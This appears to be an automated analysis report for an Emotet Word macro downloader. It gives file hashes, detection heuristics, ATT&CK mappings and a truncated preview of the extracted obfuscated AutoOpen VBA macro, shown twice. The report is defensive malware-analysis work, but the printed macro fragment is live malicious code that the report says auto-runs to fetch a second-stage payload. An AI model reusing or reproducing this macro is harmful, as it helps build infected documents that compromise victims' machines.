Emotet Office (OLE) malware analysis — malicious · 25d8545230ddfe45

MALICIOUS

Office (OLE)

116.8 KB Created: 2018-09-27 21:56:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: f7ee2734f9a40f9847424b1afd1bcac2 SHA-1: 6268a7792d61d934f8242c050417a5ace5967c4d SHA-256: 25d8545230ddfe4589b7e5b9603570e6f100d490ee8f4f2d4ffdf5917c3f4514

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains critical heuristics indicating the presence of VBA macros and a Shell() call, strongly suggesting malicious intent. ClamAV detection confirms this, identifying it as Doc.Downloader.Emotet-6884000-0. The AutoOpen macro is designed to execute automatically, likely downloading and executing a second-stage payload. The presence of the 'macros.bas' file and the Emotet family attribution further support this assessment.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6884000-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6884000-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17821 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17821 bytes
SHA-256: `fc497c24ecd12d29cd7918b42f041225b6349766121d4111f0ffb877e3c118cd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "qjCmQBTjrof" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim ILXLC(2) ILXLC(0) = Left(QojmHSl + SKtfPoTHrzdrjQhd + KLGqUlt, 942) + InStrRev(Ctmjsji + HDEKuJjoGqkHHzmovDK + LwjJVw, hKiiGAM + BFqzvvtEtupFQzjzZKNpGDD + zAzaHv) + Left(fVQBq + FFzbthBVOIooPrwXFcuTi + sBQivj, 116) + Left(AGbDowf + wGNpvYDSzQLlioAFSS + TijnPuj, 145) ILXLC(1) = InStr(IjCBCFoJ + GDZPqJzzZfsaKLnJJjrT + jPcluQJ, bQFUw + kJXRQJIstAAjhKlKuwND + RRwdFr) + InStrRev(nzhwz + kUtBPIbMjvilLYNvwri + BJzvihm, nKcTBt + qjwJJFrcbjCOfGzFLvsft + wBwCE) + InStrRev(XAzidsE + FFDJKHIMCnBfzDDGqSZWPVr + FdGBF, ZpZwqsIq + frDvfCtPOfjooScivmwRKi + AQzJj) + InStrRev(pAcGabN + AHqAlfNmHGtjasRsiREw + zSAzH, jFQCnNQ + LicNpajpJaZwLaul + nTzXJd) Dim dDlXjF(2) dDlXjF(0) = InStrRev(BQtsRJ + NOjUqMSHoYOcpfsMFpwo + rZdsVvd, KuzpzQ + PrjGrlRbYzOZMtznol + vsKikibt) + Left(iiznTA + btWfdawVvAczVdwhhAnzf + JfcYaw, 513) + Right(sVPOj + sfsSXNzBFTftrdFRQtM + BBKkc, 411) + InStrRev(wkuUmjBw + XUfuDWwmIRRWjKVCVWjG + HtZEuEV, pAVGwo + iqjjONJvftEGqOvcYasE + GrJWJXO) dDlXjF(1) = Left(zPpztj + bZbmJmKsCLMXqFHWAZII + itwVOC, 934) + InStr(QiVozs + RUDWAdFulJTRwRbFn + AODGZHO, dcOrn + hlUPTQmtwNYXVmjToSthVr + jmVcdUT) + InStrRev(SZKkbK + uptpqtsUminEqpGGLU + DbTQv, NIUEbBj + tcXJhoGPBUuVENlqNXc + lZWTAXW) + InStr(RMiwa + VDwtHoDGvQQtYRuYHRmPw + rDsfLk, rUjDWwi + EGGNfzCCCOwioAznLajjAR + kcXbZwZL) Dim zMEwc(2) zMEwc(0) = InStrRev(BiIjfpc + HmUaFvwCaibowKouljPw + znYREmvb, nqPUDOBk + GMjzDVBOKsntbFlGnjzJH + uUqXhiw) + InStrRev(nGYOjlNN + zzoOuoQdvGCZiRrrdNrzi + BWXBV, IWoGGvjQ + AlkhuzIWWrlHvsmuF + UNQHcU) zMEwc(1) = InStrRev(IMMKwwiU + PwzPzXozKCwWbRWQmU + aOiYwDK, iUqRaE + tnUQsLqRViLEVEbSTzRlp + SBFCAMG) + InStr(hSOiDoHF + BTJPOzBzubBfsoMpUR + bXJDqwi, EKvKI + DzKJdRjnUKAvQNNwsFvLESC + UWDkCVlV) Dim lQopB(1) lQopB(0) = InStrRev(zFPth + AHjCHjaFSiIlKBJHiSwsjP + AkozUSM, lfUPavKV + YtvwpMaUCOCnRtRUOpY + XuLrI) + Right(XZWRtEow + wtnhisDVpsBtDqYvBiL + rcQzAV, 341) Dim UrfjYo(2) UrfjYo(0) = InStrRev(WIhvW + STOPDjmwZpGViYaR + UsRjs, DOSVw + jHBOzJEHjiaCBdEHHwbz + qzjkH) + InStrRev(iYoXW + PHnliAqKaFzRiEJVDIKV + OYwiMFmJ, zLqPftzo + JCVoqkNHJFmqbVLwUS + wqWOupK) UrfjYo(1) = Right(MSqLDI + rlBbnNVwEXnpVXYzT + MzAjZY, 900) + InStrRev(NXWdhm + dBJwlVjYGVofGYZEbD + KojKQTKd, PURMUb + DARZStCQFIhcEwJFcEMO + UPpDtDw) + InStrRev(AnikWmHO + VCrKjOLVhapnzdNwX + mjEAa, SVqKIHjd + qfscNJBpwYJfDKPLF + zXDLkjd) + InStr(UZDIs + YLuwkRObaiEzwiDfUY + dYHsEjq, ubqALjC + ukJBYkCaZENoaRacZK + TrJVdSn) Dim zMdRa(2) zMdRa(0) = InStr(WHBJQCZG + ZuFZHzwqJOOHbCPcjGzo + RIPUQ, EJsts + OISkSkIAWpAKdkFiTqoF + rLKzru) + InStrRev(ZOYoOWq + rtfQHZwSnNJzoKbZz + cFZkPMY, oVZzMwJ + qAZGVRZWADuRANRqWKHYHE + abqqBroH) zMdRa(1) = InStrRev(VkIKb + HoXVLjXSNbicRCzMjKCCc + QvpiL, zAPCSP + SjiNYajTiLOJOEluQzijB + cRmtKk) + Right(rSYPVjj + DAVHkdIrOfvkzGzSjuU + YWlNiGRj, 450) + Left(BWJrVIl + mpHTuulOvGjYOJQdkww + TcwzG, 934) + InStrRev(AFKjO + ksfUcZcwadLsHjREzSvQfS + iTOzzqzs, bvdWzA + kfBRjUSSzpbzcOJka + uOrHOV) Dim SvsDhr(2) SvsDhr(0) = InStrRev(mthoYw + RZqBHqzwPknawkpjt + UNhwWqsq, KapoiZWc + FRGIpOnljRJhVTIUaFHT + AiRRLSE) + InStrRev(qDHZJHCH + iAtTkCNHEqzjpfWTs + utiBVu, XzVFJ + OhPFEKztEpsTctzRGzojj + vjsbtI) + Left(QpDnLQj + wjBfkrJIrUGawiBdERLjnk + kFlBWDDm, 12) + Left(KpjwkQk + rUtVPGrTzNvYAYWwDWLikHq + SaQDIV, 998) SvsDhr(1) = InStr(PmQLj + vnmoKNalZTfmYRWAJj + DAIJHEir, hpUDz + NqRiBUiENwoirAjoCSGV + jVEStUR) + InStrRev(wtsEB + FFqjCESETULIYNBUzZl + hdYuXswh, MAiUic + OZAGDlpZChjETwwfXsLXn + LGpsWrw) + InStrRev(jsaanF + tAbUtDSFzfwCBTajjm + kUvNFbzs, winbPRCJ + uQnUhfGMWPaMzzqbrGFN + XZbEI) + InStr(LPvUhaj + sfviXclPTMhpCkQJ + BEpoOzPW, JBoNZS + FzpooUsEFRzJXTaFpIUMOw + juzPk) fANEWSKqkBbZdU (KeyString(KrVIV + wvqzwXa + 15 + 4 + 48 + InGraCi + RZzZir) + iXBjm + oFTGXX + KeyString(JjdiB + IICjEOj + 17 + 5 + 55 + zrzpDr + zqCUic) + AlVZTL + aZXk ... (truncated)

SHA-256: fc497c24ecd12d29cd7918b42f041225b6349766121d4111f0ffb877e3c118cd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "qjCmQBTjrof"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim ILXLC(2)
ILXLC(0) = Left(QojmHSl + SKtfPoTHrzdrjQhd + KLGqUlt, 942) + InStrRev(Ctmjsji + HDEKuJjoGqkHHzmovDK + LwjJVw, hKiiGAM + BFqzvvtEtupFQzjzZKNpGDD + zAzaHv) + Left(fVQBq + FFzbthBVOIooPrwXFcuTi + sBQivj, 116) + Left(AGbDowf + wGNpvYDSzQLlioAFSS + TijnPuj, 145)
ILXLC(1) = InStr(IjCBCFoJ + GDZPqJzzZfsaKLnJJjrT + jPcluQJ, bQFUw + kJXRQJIstAAjhKlKuwND + RRwdFr) + InStrRev(nzhwz + kUtBPIbMjvilLYNvwri + BJzvihm, nKcTBt + qjwJJFrcbjCOfGzFLvsft + wBwCE) + InStrRev(XAzidsE + FFDJKHIMCnBfzDDGqSZWPVr + FdGBF, ZpZwqsIq + frDvfCtPOfjooScivmwRKi + AQzJj) + InStrRev(pAcGabN + AHqAlfNmHGtjasRsiREw + zSAzH, jFQCnNQ + LicNpajpJaZwLaul + nTzXJd)
   Dim dDlXjF(2)
dDlXjF(0) = InStrRev(BQtsRJ + NOjUqMSHoYOcpfsMFpwo + rZdsVvd, KuzpzQ + PrjGrlRbYzOZMtznol + vsKikibt) + Left(iiznTA + btWfdawVvAczVdwhhAnzf + JfcYaw, 513) + Right(sVPOj + sfsSXNzBFTftrdFRQtM + BBKkc, 411) + InStrRev(wkuUmjBw + XUfuDWwmIRRWjKVCVWjG + HtZEuEV, pAVGwo + iqjjONJvftEGqOvcYasE + GrJWJXO)
dDlXjF(1) = Left(zPpztj + bZbmJmKsCLMXqFHWAZII + itwVOC, 934) + InStr(QiVozs + RUDWAdFulJTRwRbFn + AODGZHO, dcOrn + hlUPTQmtwNYXVmjToSthVr + jmVcdUT) + InStrRev(SZKkbK + uptpqtsUminEqpGGLU + DbTQv, NIUEbBj + tcXJhoGPBUuVENlqNXc + lZWTAXW) + InStr(RMiwa + VDwtHoDGvQQtYRuYHRmPw + rDsfLk, rUjDWwi + EGGNfzCCCOwioAznLajjAR + kcXbZwZL)
   Dim zMEwc(2)
zMEwc(0) = InStrRev(BiIjfpc + HmUaFvwCaibowKouljPw + znYREmvb, nqPUDOBk + GMjzDVBOKsntbFlGnjzJH + uUqXhiw) + InStrRev(nGYOjlNN + zzoOuoQdvGCZiRrrdNrzi + BWXBV, IWoGGvjQ + AlkhuzIWWrlHvsmuF + UNQHcU)
zMEwc(1) = InStrRev(IMMKwwiU + PwzPzXozKCwWbRWQmU + aOiYwDK, iUqRaE + tnUQsLqRViLEVEbSTzRlp + SBFCAMG) + InStr(hSOiDoHF + BTJPOzBzubBfsoMpUR + bXJDqwi, EKvKI + DzKJdRjnUKAvQNNwsFvLESC + UWDkCVlV)
   Dim lQopB(1)
lQopB(0) = InStrRev(zFPth + AHjCHjaFSiIlKBJHiSwsjP + AkozUSM, lfUPavKV + YtvwpMaUCOCnRtRUOpY + XuLrI) + Right(XZWRtEow + wtnhisDVpsBtDqYvBiL + rcQzAV, 341)
   Dim UrfjYo(2)
UrfjYo(0) = InStrRev(WIhvW + STOPDjmwZpGViYaR + UsRjs, DOSVw + jHBOzJEHjiaCBdEHHwbz + qzjkH) + InStrRev(iYoXW + PHnliAqKaFzRiEJVDIKV + OYwiMFmJ, zLqPftzo + JCVoqkNHJFmqbVLwUS + wqWOupK)
UrfjYo(1) = Right(MSqLDI + rlBbnNVwEXnpVXYzT + MzAjZY, 900) + InStrRev(NXWdhm + dBJwlVjYGVofGYZEbD + KojKQTKd, PURMUb + DARZStCQFIhcEwJFcEMO + UPpDtDw) + InStrRev(AnikWmHO + VCrKjOLVhapnzdNwX + mjEAa, SVqKIHjd + qfscNJBpwYJfDKPLF + zXDLkjd) + InStr(UZDIs + YLuwkRObaiEzwiDfUY + dYHsEjq, ubqALjC + ukJBYkCaZENoaRacZK + TrJVdSn)
   Dim zMdRa(2)
zMdRa(0) = InStr(WHBJQCZG + ZuFZHzwqJOOHbCPcjGzo + RIPUQ, EJsts + OISkSkIAWpAKdkFiTqoF + rLKzru) + InStrRev(ZOYoOWq + rtfQHZwSnNJzoKbZz + cFZkPMY, oVZzMwJ + qAZGVRZWADuRANRqWKHYHE + abqqBroH)
zMdRa(1) = InStrRev(VkIKb + HoXVLjXSNbicRCzMjKCCc + QvpiL, zAPCSP + SjiNYajTiLOJOEluQzijB + cRmtKk) + Right(rSYPVjj + DAVHkdIrOfvkzGzSjuU + YWlNiGRj, 450) + Left(BWJrVIl + mpHTuulOvGjYOJQdkww + TcwzG, 934) + InStrRev(AFKjO + ksfUcZcwadLsHjREzSvQfS + iTOzzqzs, bvdWzA + kfBRjUSSzpbzcOJka + uOrHOV)
   Dim SvsDhr(2)
SvsDhr(0) = InStrRev(mthoYw + RZqBHqzwPknawkpjt + UNhwWqsq, KapoiZWc + FRGIpOnljRJhVTIUaFHT + AiRRLSE) + InStrRev(qDHZJHCH + iAtTkCNHEqzjpfWTs + utiBVu, XzVFJ + OhPFEKztEpsTctzRGzojj + vjsbtI) + Left(QpDnLQj + wjBfkrJIrUGawiBdERLjnk + kFlBWDDm, 12) + Left(KpjwkQk + rUtVPGrTzNvYAYWwDWLikHq + SaQDIV, 998)
SvsDhr(1) = InStr(PmQLj + vnmoKNalZTfmYRWAJj + DAIJHEir, hpUDz + NqRiBUiENwoirAjoCSGV + jVEStUR) + InStrRev(wtsEB + FFqjCESETULIYNBUzZl + hdYuXswh, MAiUic + OZAGDlpZChjETwwfXsLXn + LGpsWrw) + InStrRev(jsaanF + tAbUtDSFzfwCBTajjm + kUvNFbzs, winbPRCJ + uQnUhfGMWPaMzzqbrGFN + XZbEI) + InStr(LPvUhaj + sfviXclPTMhpCkQJ + BEpoOzPW, JBoNZS + FzpooUsEFRzJXTaFpIUMOw + juzPk)
fANEWSKqkBbZdU (KeyString(KrVIV + wvqzwXa + 15 + 4 + 48 + InGraCi + RZzZir) + iXBjm + oFTGXX + KeyString(JjdiB + IICjEOj + 17 + 5 + 55 + zrzpDr + zqCUic) + AlVZTL + aZXk
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.